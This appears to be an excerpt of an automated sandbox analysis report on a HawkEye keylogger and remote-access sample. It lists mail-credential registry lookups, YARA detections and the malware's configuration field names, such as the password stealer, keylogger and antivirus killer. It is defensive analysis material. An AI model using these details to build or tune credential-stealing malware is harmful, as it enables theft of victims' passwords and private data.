Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 12_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 12_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: ESMTPPassword 12_2_004033B1
Yara detected WebBrowserPassView password recovery tool
Source: Yara match | File source: 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.1970485212.0000000004C13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2384332415.0000000006EC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 4780, type: MEMORY
Source: Yara match | File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara match | File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected HawkEye RAT
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Yara detected HawkEye Keylogger
Source: Yara match | File source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara match | File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara match | File source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Behavior Graph
